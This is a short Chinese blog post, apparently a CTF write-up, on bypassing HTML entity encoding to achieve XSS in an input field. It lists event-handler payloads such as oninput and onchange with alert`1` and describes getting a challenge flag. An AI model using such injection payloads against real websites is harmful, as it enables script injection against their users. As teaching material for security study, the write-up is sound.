• xss实体绕过示例


    知识点:
    倘若是在script、input标签当中,即可突破。
    Payload
    ' oninput=alert`1` // 当要在input中输入内容时触发事件
    ' oninput=alert`1` ' 同上
    ' onchange=alert`1` // 发生改变的时候触发该事件
    ' onchange=alert`1` ' 同上
    在script里直接alert
     
    示例:
    首选输入测试语句<script>alert(/Micr067/)</script>,
    查看源码发现做了实体编码。
    使用xss实体绕过即可突破,
    先输入 ' oninput=alert`1` // 提交,
    在input中输入内容时触发事件,输入数字1即触发xss弹窗,
    获得flag{Network_security_Era}
  • 相关阅读:
    THINKPHP导入全部post参数
    thinkphp 表单一些
    随机唯一不重复
    TP关联模型
    PHP函数之类
    MSSQLid清零
    httpwebrequest异步参考
    反射
    UrlOper
    工作周记
  • 原文地址:https://www.cnblogs.com/micr067/p/11396201.html
Copyright © 2020-2023  润新知